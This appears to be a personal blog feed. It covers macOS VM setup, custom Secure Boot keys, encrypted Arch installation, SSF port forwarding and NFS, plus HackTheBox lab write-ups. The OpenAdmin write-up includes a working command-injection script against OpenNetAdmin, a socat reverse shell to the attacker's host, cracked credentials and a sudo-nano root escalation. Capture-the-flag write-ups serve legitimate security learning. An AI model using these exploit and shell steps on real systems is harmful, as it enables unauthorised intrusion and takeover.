RAM>G \</code></pre>Configuring Screen Resolution</h4> You will need to set the screen resolution unless you like to work with 1280x720. Thankfully, this is somewhat simple. I recommend installing Clover Configurator to simplify this process. Either way, you will need to mount the EFI partition and then edit the config.plst contained within the Clover directory. With Clover Configurator, simply select mount on the proper partition. Then navigate to GUI and select the proper screen resolution from the dropdown. Keep in mind that certain screen resolutions do not work properly, so the creator of the script recommends a normal 16:9 or 16:10 resolution. Enabling iMessage</h4> You should be done with that for now. Next you will need to generate new serial numbers to enable iMessage and other services. In Clover Configurator, navigate to the RT variables section and choose "UseMacAddr0" in the ROM dropdown. Also enter 0x28 into the BooterConfig and 0x67 into the CsrActiveConfig. Now select SMBIOS. On the far right there should be a small dropdown. Select any Mac model you'd like from it; I chose a recent iMac model. Now select Generate New a couple of times for both the Serial Number and SmUUID fields. You can verify that your Serial Number is correct by visiting EveryMac</a> and entering your serial number. If the correct model shows up, then you can proceed, otherwise just generate a new Serial Number. Next, go to Apple's website</a> and enter the Serial Number there. The website should return you an error that the Serial Number is invalid. This is correct as you do not want to have an actual Mac's serial number that someone owns. If it does give a model, you need to generate a new Serial Number and repeat the process. Finishing up Configuration</h4> Save your clover config. Clover Configurator might complain that the partition does not support file history, but you can safely ignore that. Now shut down the VM. Re-run basic.sh ./basic.sh </blockquote> Press escape when the VM comes up to enter the virtual machine BIOS. Select Device Manager, then OVMF Platform Configuration, and finally Change Preferred to select the correct screen resolution that you entered earlier. Press F10 to save the settings and then exit the VM after you exit the BIOS. Adding the VM to Virt-Manager</h3> For actual use, you will probably want to add it to virt-manager. Luckily, the script author made it very simple. Execute this command to import it into virt-manager: sudo ./make.sh --add </blockquote> Lastly, go into virt-manager and add the virtual disk you originally created to the virtual machine and then start and open the virtual machine. Finishing Up</h3> When Clover comes up, use the arrow keys to select macOS on <diskname>. If everything is done correctly, simply login to your account and you can now use your macOS VM as usual. You can login to your AppleID to use iMessage and iCloud, and it should work. The only thing that unfortunately does not work is USB passthrough for an iOS device. The only way to do this is to actually use PCI passthrough to pass the USB controller to the Mac VM which is quite complicated, especially if you use a laptop like me. If you would like to attempt this, there is a nice article on the script's GitHub repository which covers PCI passthrough.</a> You now have a fully functional macOS VM with KVM/QEMU. References</h3> GitHub - foxlet/macOS-Simple-KVM: Tools to set up a quick macOS VM in QEMU, accelerated by KVM.</a></li> An iDiot's Guide To iMessage | tonymacx86.com</a></li> </ol> Enrolling Custom Secure Boot Keys 2020-05-22T00:19:57-04:00 Secure boot is a feature meant to increase the security of your computer without you usually even having to worry about it. It essentially verifies that your bootloader is actually the bootloader it says it is and makes sure the bootloader is in a list of approved bootloaders. If you want to read more about secure boot, I recommend this HowToGeek article</a> which descirbes some of what secure boot does. Why Custom Keys?</h4> By default your computer comes with a variety of Secure Boot Keys from the OEM (Original Equipment Manufacturer), which for most people is fine, but if you are extremely concerned about your computer's security or if you just want to mess around with secure boot for fun like me, putting your own keys into your computer's UEFI firmware is actually quite easy provided you are running Linux or have access to a Linux Live ISO on a USB. The process is traditionally considered complicated as you need to use openssl and a bunch of commands to get your own keys, but I was able to use cryptboot</a> to roll custom keys on my new Arch Linux installation as well as for my Windows 10 installation on a separate drive. The cryptboot readme will tell you that you need to have a specific partition scheme and encryption to utilize the software, but this is actually false. Once you install the software, you can easily disregard the rest of the readme. Removing OEM Keys</h4> The first step to putting your own custom keys into your UEFI firmware is to remove the manufacturer's original keys. You will need to boot into the UEFI BIOS to access these settings which varies from computer to computer, but mine was easily accessed by pressing the F2 key on boot. From there locate the Security and/or Secure Boot configuration settings. Then you will need to delete all keys. My laptop was made by Dell who have actually added a feature where you can run in Custom mode so any changes you make are completely reversible if you decide you do not want to proceed or if you cannot get it to work. Below is a screenshot of my UEFI firmware: Make sure you delete the original keys or else the process will not work. Even selecting Audit mode will not allow the script to enroll your custom keys in the firmware. Enrolling Your Keys</h4> The last few steps are pretty simple. Logon to the Linux distribution of your choice and open a root terminal session. You will need to know the location of your bootloader's EFI file. For Linux, this file can be found in the following location on the EFI partition: EFI/grub/grubx64.efi</code></pre> On Windows it can be found here: EFI/Microsoft/Boot/bootmgfw.efi</code></pre> Now you will need to execute the following commands: This command will prompt you for a name, you can choose whatever you like as it won't actually affect the keys themselves. By default the command places the keys in /boot/efikeys. cryptboot-efikeys create</code></pre> This command will actually place the keys in your UEFI firmware. If you see any errors when running this command, then you need to ensure you deleted the OEM keys. If it fails, your keys are most likely not enrolled. cryptboot-efikeys enroll</code></pre>Signing Bootloaders</h4> The very last step is to sign the bootloaders which you will use. (Replace the path with whatever bootloader you use and repeat for multiple bootloaders i.e. Grub and Windows Boot Manager) cryptboot-efikeys sign "EFI/grub/grubx64.efi"</code></pre>Finishing Up</h4> Now, you can reboot your computer and again enter the UEFI firmware to ensure that Secure Boot is enabled in Deploy mode (if your computer has that option). If the computer fails to boot your OS after doing this, do not panic! Simply disable Secure Boot, and your operating system will load as usual in which case you can debug what went wrong. You should now have a fully functional custom Secure Boot installation. If your /boot directory is not encrypted and on your main drive, I would recommend transferring the files within the /boot/efikeys to either an encrypted drive or a flash drive you keep somewhere safe, or even better an encrypted flash drive. Otherwise, an attacker could easily read your drive, grab the keys and sign their own bootloader which completely negates Secure Boot. If you do not plan to install another operating system on the computer, you could even delete the keys completely and be fine. The boot manager is never changed on Linux, and I do not believe it is on Windows either; and if it is, you can simply delete the keys in the UEFI firmware and create and enroll new ones again. Arch Linux Full Encryption Installation Guide 2020-04-06T12:52:52-04:00 Arch Linux w/ Fully Encrypted Filesystem</h1> This guide will show step by step how to create a clean Arch Linux install with a fully encrypted filesystem. This means that even the boot partition will be encrypted. The only unencrypted partition on the disk will be the EFI partition which could be configured later to use secure boot. Assuming an EFI system with GPT disk. Basic Install Stuff</h3> Make sure you can hit the outside world: ping google.com </blockquote> If not run dhcpcd: dhcpcd </blockquote> Set the time: timedatectl set-ntp true </blockquote> Setup the Disk (where the magic happens)</h3> Create Partitions</h4> Assuming /dev/sda is the device you want to install to. parted /dev/sda </blockquote> mklabel gpt </blockquote> mkpart ESP fat32 1MiB 200MiB </blockquote> set 1 boot on </blockquote> name 1 efi </blockquote> mkpart primary 800MiB 100% </blockquote> set 2 lvm on </blockquote> name 2 lvm </blockquote> print </blockquote> Setup LUKS</h4> Encrypt the partition cryptsetup luksFormat --type luks1 /dev/sda2 </blockquote> Open the partition cryptsetup open /dev/sda2 encrypted-lvm </blockquote> Setup LVM</h4> Create a Physical Volume pvcreate /dev/mapper/encrypted-lvm </blockquote> Create a volume group vgcreate arch /dev/mapper/encrypted-lvm </blockquote> Create logical volumes in group lvcreate -n home -L <SIZE>G arch </blockquote> lvcreate -n root -L <SIZE>G arch </blockquote> lvcreate -n boot -L 600M arch </blockquote> lvcreate -n swap -L <SIZE> -C y arch </blockquote> Format Partitions</h4> Format the EFI partition mkfs.fat -F32 /dev/sda1 </blockquote> Format the Volume Groups mkfs.ext4 -L boot /dev/mapper/arch-boot </blockquote> mkfs.btrfs -L root /dev/mapper/arch-root </blockquote> mkfs.btrfs -L home /dev/mapper/arch-home </blockquote> mkswap /dev/mapper/arch-swap </blockquote> Mount Partitions</h3> Configure Swap swapon /dev/mapper/arch-swap swapon -a; swapon -s </blockquote> Mount the filesystem mount /dev/mapper/arch-root /mnt </blockquote> mkdir -p /mnt/{home,boot} </blockquote> mount /dev/mapper/boot /mnt/boot </blockquote> mount /dev/mapper/arch-home /mnt/home </blockquote> mkdir /mnt/boot/efi </blockquote> mount /dev/sda1 /mnt/boot/efi </blockquote> Check how everything is mounted lsblk -f </blockquote> Install the Base System</h3> Install base packages pacstrap /mnt base efibootmgr btrfs-progs grub linux-zen linux-firmware lvm2 </blockquote> Generate Fstab genfstab -U -p /mnt > /mnt/etc/fstab </blockquote> Chroot into new install arch-chroot /mnt /bin/bash </blockquote> Configure the Install</h3> Normal Things</h4> Set the time zone ln -sf /usr/share/zoneinfo/Region/City /etc/localtime </blockquote> hwclock --systohc </blockquote> Localization Uncomment "en_US.UTF-8 UTF-8" from /etc/locale.gen locale-gen </blockquote> echo "LANG=en_US.UTF-8" > /etc/locale.conf </blockquote> Set the hostname echo "hostname" > /etc/hostname </blockquote> Edit /etc/hosts to 127.0.0.1 localhost ::1 localhost 127.0.1.1 hostname.localdomain hostname</code></pre>Encryption Unlock</h4> Generate a keyfile for the root filesystem: dd bs=512 count=4 if=/dev/random of=/root/encrypted-lvm.keyfile iflag=fullblock </blockquote> chmod 000 /root/encrypt-lvm.keyfile </blockquote> cryptsetup -v luksAddKey /dev/sda2 /root/encrypted-lvm.keyfile </blockquote> Edit /etc/mkinitcpio.conf and add keyboard keymap encrypt lvm2 to hooks and add keyfile to files FILES=(/root/encrypted-lvm.keyfile) HOOKS=(base udev autodetect keyboard keymap consolefont modconf block encrypt lvm2 filesystems fsck)</code></pre> Then generate the initramfs image: mkinitcpio -p linux-zen </blockquote> Secure the embedded keyfile: chmod 600 /boot/initramfs-linux* </blockquote> Configure grub, edit /etc/default/grub: GRUB_ENABLE_CRYPTODISK=y GRUB_CMDLINE_LINUX="... cryptdevice=/dev/sda2:encrypted-lvm ... cryptkey=rootfs:/root/encrypted-lvm.keyfile"</code></pre> Install grub: grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=GRUB --recheck </blockquote> grub-mkconfig -o /boot/grub/grub.cfg </blockquote> Final Cleanup</h4> Set a root password passwd Add a normal user account if desired. </blockquote> Reboot into New Install</h3> exit </blockquote> umount -R /mnt </blockquote> reboot </blockquote> The system should be configured with full disk encryption and an encrypted boot partition. References</h3> Installation guide - ArchWiki</a></li> dm-crypt/Encrypting an entire system - ArchWiki</a></li> Install Arch Linux with full hard drive encryption using luks encryption | ComputingForGeeks</a></li> </ol> Configuring SSF to Port Forward 2020-03-06T12:57:17-04:00 Configuring SSF for Port Forwarding</h1> To configure SSF you have to do different things on the server with the public facing IP and on the client which runs the service you want to forward. Install SSF</h3> Do on both Server and Client</h4> Download SSF: SSF - Secure Socket Funneling - Network tool - TCP and UDP port forwarding, SOCKS proxy, Remote shell, Native Relay protocol, Standalone</a> Extract to /opt/ssf # unzip *.zip /opt/ssf </blockquote> Setup keys</h3> SSF - Secure Socket Funneling - Network tool - TCP and UDP port forwarding, SOCKS proxy, Remote shell, Native Relay protocol, Standalone</a> </blockquote> Do on both the Server and Client</h4> Generate Diffie-Hellman parameters # openssl dhparam 4096 -outform PEM -out dh4096.pem </blockquote> Do on the Client</h4> Generate a Certificate Authority # openssl req -x509 -nodes -newkey rsa:4096 -keyout ca.key -out ca.crt -days 3650 </blockquote> Copy to Server</h4> # scp /opt/ssf/certs/ca.* user@<server-ip>:/opt/ssf/certs/ </blockquote> Do on both the Server and Client</h4> Create 'extfile.txt': # touch extfile.txt </blockquote> [ v3_req_p ] basicConstraints = CA:FALSE keyUsage = nonRepudiation, digitalSignature, keyEncipherment [ v3_ca_p ] basicConstraints = CA:TRUE keyUsage = nonRepudiation, digitalSignature, keyEncipherment, keyCertSign</code></pre> Generate private key and certificate (leave fields blank): # openssl req -newkey rsa:4096 -nodes -keyout private.key -out certificate.csr </blockquote> # openssl x509 -extfile extfile.txt -extensions v3_req_p -req -sha1 -days 3650 -CA ca.crt -CAkey ca.key -CAcreateserial -in certificate.csr -out certificate.crt </blockquote> # cat ca.crt >> certificate.crt </blockquote> Encrypt private key with password: # openssl rsa -in private.key -out private.key -aes256 -passout pass:<password> </blockquote> Move ca.crt to Trusted Folder: # mv /opt/ssf/certs/ca.crt /opt/ssf/certs/trusted/ca.crt </blockquote> Create Configuration File for SSF</h3> On Server</h4> # touch /opt/ssf/ssf.conf </blockquote> { "ssf": { "arguments": "", "circuit": [], "tls" : { "ca_cert_path": "/opt/ssf/certs/trusted/ca.crt", "cert_path": "/opt/ssf/certs/certificate.crt", "key_path": "/opt/ssf/certs/private.key", "key_password": "<server-private-key-password>", "dh_path": "/opt/ssf/certs/dh4096.pem", "cipher_alg": "DHE-RSA-AES256-GCM-SHA384" }, "http_proxy" : { "host": "", "port": "", "user_agent": "", "credentials": { "username": "", "password": "", "domain": "", "reuse_ntlm": "true", "reuse_nego": "true" } }, "services": { "datagram_forwarder": { "enable": false }, "datagram_listener": { "enable": false, "gateway_ports": false }, "stream_forwarder": { "enable": false }, "stream_listener": { "enable": true, "gateway_ports": true }, "copy": { "enable": false }, "shell": { "enable": false, "path": "/bin/bash|C:\\windows\\system32\\cmd.exe", "args": "" }, "socks": { "enable": false } } } } </code></pre>On Client</h4> # touch /opt/ssf/ssf.conf </blockquote> { "ssf": { "arguments": "", "circuit": [], "tls" : { "ca_cert_path": "/opt/ssf/certs/trusted/ca.crt", "cert_path": "/opt/ssf/certs/certificate.crt", "key_path": "/opt/ssf/certs/private.key", "key_password": "<client-private-key-password>", "dh_path": "/opt/ssf/certs/dh4096.pem", "cipher_alg": "DHE-RSA-AES256-GCM-SHA384" }, "http_proxy" : { "host": "", "port": "", "user_agent": "", "credentials": { "username": "", "password": "", "domain": "", "reuse_ntlm": "true", "reuse_nego": "true" } }, "services": { "datagram_forwarder": { "enable": false }, "datagram_listener": { "enable": false, "gateway_ports": false }, "stream_forwarder": { "enable": true }, "stream_listener": { "enable": false, "gateway_ports": true }, "copy": { "enable": false }, "shell": { "enable": false, "path": "/bin/bash|C:\\windows\\system32\\cmd.exe", "args": "" }, "socks": { "enable": false } } } } </code></pre>Configure Systemd Services</h3> # /etc/systemd/system/ssf-server.service </blockquote> [Unit] Description=SSF Server Service After=network.target [Service] User=root ExecStart=/opt/ssf/ssfd -p <port-to-host-ssf-on> -c /opt/ssf/ssf.conf -g [Install] WantedBy=multi-user.target </code></pre> # /etc/systemd/system/ssf-client.service </blockquote> [Unit] Description=SSF Client Service After=network.target [Service] User=root ExecStart=/opt/ssf/ssf -R 0.0.0.0:<port-to-forward>:127.0.0.1:<port-to-forward> -p <port-to-host-ssf-on> <server-public-ip> -c /opt/ssf/ssf.conf -g [Install] WantedBy=multi-user.target</code></pre>Enable Services and Start Them</h3> On Server</h4> # systemctl enable ssf-server.service </blockquote> # service ssf-server start </blockquote> On Server</h4> # systemctl enable ssf-client.service </blockquote> # service ssf-client start </blockquote> NFS Share Setup CentOS 2020-02-28T12:44:37-04:00 CentOS NFS Share Setup</h1> Misc Things</h2> Get temporary network: sudo dhclient </blockquote> Reboot faster: sudo init 6 </blockquote> Format /dev/sdb</h2> Install rpmfusion</a> for exfat support. sudo dnf install --nogpgcheck https://dl.fedoraproject.org/pub/epel/epel-release-latest-8.noarch.rpm sudo dnf install --nogpgcheck https://download1.rpmfusion.org/free/el/rpmfusion-free-release-8.noarch.rpm https://download1.rpmfusion.org/nonfree/el/rpmfusion-nonfree-release-8.noarch.rpm sudo dnf config-manager --enable PowerTools sudo dnf update sudo dnf install exfat-utils fuse-exfat </blockquote> Format drive: sudo mkfs.exfat /dev/sdb </blockquote> Mount: sudo mkdir /mount-point </blockquote> sudo mount /dev/sdb /mount-point </blockquote> Setup fstab entry: sudo vim /etc/fstab </blockquote> /dev/sdb /mount-point exfat rw,async,umask=0 0 0</code></pre>Setup NFS</h2> Tutorial used: Setting Up an NFS Server and Client on CentOS 7.2</a> Install software</li> </ol> yum install nfs-utils </blockquote> Setup Startup Scripts</li> </ol> systemctl enable nfs-server.service </blockquote> systemctl start nfs-server.service </blockquote> Setup NFS Make the config</li> </ol> sudo vim /etc/export: </blockquote> /mount-point 192.168.0.2(rw, no_squash_root) 192.168.0.3(rw, no_squash_root)</code></pre> Export the config: sudo exportfs -a </blockquote> Those IP's should now have read/write access to the share. Update SELinux Boolean: sudo setsebool -P nfs_export_all_rw 1 </blockquote> Setup final networking</li> </ol> Setup Static IP on CentOS: Edit Networking config: sudo vim /etc/sysconfig/network-scripts/ifcfg-<interfacename> </blockquote> NETMASK=225.255.255.0 GATEWAY=192.168.0.1 IPADDR=192.168.0.2 ONBOOT=yes BOOTPROTO=none USERCTL=no</code></pre> Allow through firewall: Use this command to find ports rpcinfo -p </blockquote> Then enable the ports: firewall-cmd --permanent --add-port=<portnumber>/<tcp or udp> </blockquote> firewall-cmd --reload </blockquote> HackTheBox OpenAdmin Quick Writeup 2020-02-06T13:14:27-04:00 OpenAdmin</h1> Box IP: 10.10.10.171 Enumeration</h2> ╰─$ sudo nmap -T1 -p 80,443 10.10.10.171 PORT STATE SERVICE 80/tcp open http 443/tcp closed https Nmap done: 1 IP address (1 host up) scanned in 45.44 seconds </code></pre> http://10.10.10.171/ona ONA v18.1.1 #!/bin/bash URL="${1}" while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1 done</code></pre> ./ona.sh 10.10.10.171/ona/ Used socat to get a proper shell: On my machine: socat file:`tty`,raw,echo=0 tcp-listen:4040 On box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.102:4040</code></pre> Found: // If no user name is passed in then use dcm.pl as the login name // be careful as this currently does not require a password. // FIXME: this needs to go away as it is a backdoor. allow it to be configurable at least? // Start out the session as a guest with level 0 access. This is for view only mode. // You can enable or disable this by setting the "disable_guest" sysconfig option </code></pre> Found: 'db_type' => 'mysqli', 'db_host' => 'localhost', 'db_login' => 'ona_sys', 'db_passwd' => 'n1nj4W4rri0R!', 'db_database' => 'ona_default', 'db_debug' => false, </code></pre> Found: mysql> SELECT * FROM users; +----+----------+----------------------------------+-------+---------------------+---------------------+ | id | username | password | level | ctime | atime | +----+----------+----------------------------------+-------+---------------------+---------------------+ | 1 | guest | 098f6bcd4621d373cade4e832627b4f6 | 0 | 2020-02-07 05:49:35 | 2020-02-07 05:49:35 | | 2 | admin | 21232f297a57a5a743894a0e4a801fc3 | 0 | 2020-02-07 05:48:24 | 2020-02-07 05:48:24 | +----+----------+----------------------------------+-------+---------------------+---------------------+ </code></pre> Admin password hash of "21232f297a57a5a743894a0e4a801fc3" is simply "admin" Can now login to panel as admin. jimmy@10.10.10.171 pass: n1nj4W4rri0R! Found /var/www/internal/main.php: php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; # Open Admin Trusted # OpenAdmin $output = shell_exec('cat /home/joanna/.ssh/id_rsa'); echo "<pre>$output</pre>"; ?> <html> <h3>Don't forget your "ninja" password</h3> Click here to logout <a href="logout.php" tite = "Logout">Session </html> </code></pre> Found after curling the file and finding port in /etc/apache2/sites-enabled/internal.conf jimmy@openadmin:/var/www/internal$ curl localhost:52846/main.php <pre>-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8 ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE 6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI 9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4 piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/ /U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH 40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb 9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80 X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr 1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2 XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79 yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM +4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN -----END RSA PRIVATE KEY----- </pre><html> <h3>Don't forget your "ninja" password</h3> Click here to logout <a href="logout.php" tite = "Logout">Session </html> </code></pre> Convert the rsa key to a hash /usr/share/john/ssh2john.py joanna.rsa > joanna.hash Cracked the RSA Key with john: ╰─$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt joanna.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 6 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status bloodninjas (joanna.rsa) 1g 0:00:00:06 DONE (2020-02-23 00:08) 0.1564g/s 2244Kp/s 2244Kc/s 2244KC/s 1990..*7¡Vamos! Session completed </code></pre> Password: bloodninjas Got Joanna</h3> ╰─$ ssh joanna@10.10.10.171 -i joanna.rsa 255 ↵ Enter passphrase for key 'joanna.rsa': Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) </code></pre> Got user.txt: joanna@openadmin:~$ cat user.txt c9b2cf07d40807e62af62660f0c81b5f </code></pre> Time to exploit nano: joanna@openadmin:~$ sudo -l Matching Defaults entries for joanna on openadmin: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User joanna may run the following commands on openadmin: (ALL) NOPASSWD: /bin/nano /opt/priv </code></pre> Easiest way: joanna ALL=(ALL) NOPASSWD:ALL</code></pre> Save to /etc/sudoers Got Root</h3> Then just execute 'sudo su': root@openadmin:~# cat root.txt 2f907ed450b361b2c2bf4e8795d5b561 </code></pre> HackTheBox SwagShop Quick Writeup 2019-09-07T13:12:14-04:00 SwagShop</h1> Machine IP: 10.10.10.140 Enumeration</h3> Nmap Scan</h4> nmap -T4 -p- 10.10.10.140 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-07 15:07 EDT Nmap scan report for 10.10.10.140 Host is up (0.091s latency). Not shown: 65525 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1039/tcp filtered sbl 2525/tcp filtered ms-v-worlds 5232/tcp filtered sgi-dgl 26255/tcp filtered unknown 47037/tcp filtered unknown 48924/tcp filtered unknown 51397/tcp filtered unknown 62470/tcp filtered unknown Nmap done: 1 IP address (1 host up) scanned in 888.99 seconds</code></pre>nmap -T4 -A -p22,80,1039,2525,5232,26255,47037,48924,51397,62470 10.10.10.140 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-07 15:23 EDT Nmap scan report for 10.10.10.140 Host is up (0.049s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Home page 1039/tcp closed sbl 2525/tcp closed ms-v-worlds 5232/tcp closed sgi-dgl 26255/tcp closed unknown 47037/tcp closed unknown 48924/tcp closed unknown 51397/tcp closed unknown 62470/tcp closed unknown No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=9/7%OT=22%CT=1039%CU=44622%PV=Y%DS=2%DC=T%G=Y%TM=5D740 OS:3DA%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)O OS:PS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DS OS:T11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)E OS:CN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5 OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF= OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40% OS:CD=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1039/tcp) HOP RTT ADDRESS 1 48.38 ms 10.10.14.1 2 48.51 ms 10.10.10.140 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.57 seconds</code></pre>Dirb</h4> dirb http://10.10.10.140 ---- Scanning URL: http://10.10.10.140/ ---- ==> DIRECTORY: http://10.10.10.140/app/ ==> DIRECTORY: http://10.10.10.140/errors/ + http://10.10.10.140/favicon.ico (CODE:200|SIZE:1150) ==> DIRECTORY: http://10.10.10.140/includes/ + http://10.10.10.140/index.php (CODE:200|SIZE:16097) ==> DIRECTORY: http://10.10.10.140/js/ ==> DIRECTORY: http://10.10.10.140/lib/ ==> DIRECTORY: http://10.10.10.140/media/ ==> DIRECTORY: http://10.10.10.140/pkginfo/ + http://10.10.10.140/server-status (CODE:403|SIZE:300) ==> DIRECTORY: http://10.10.10.140/shell/ ==> DIRECTORY: http://10.10.10.140/skin/ ==> DIRECTORY: http://10.10.10.140/var/ ---- Entering directory: http://10.10.10.140/app/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/errors/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/js/ ---- ==> DIRECTORY: http://10.10.10.140/js/calendar/ ==> DIRECTORY: http://10.10.10.140/js/flash/ ==> DIRECTORY: http://10.10.10.140/js/lib/ ==> DIRECTORY: http://10.10.10.140/js/tiny_mce/ ---- Entering directory: http://10.10.10.140/lib/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/media/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/pkginfo/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/shell/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/skin/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/var/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/js/calendar/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/js/flash/ ---- (!) WARNING: 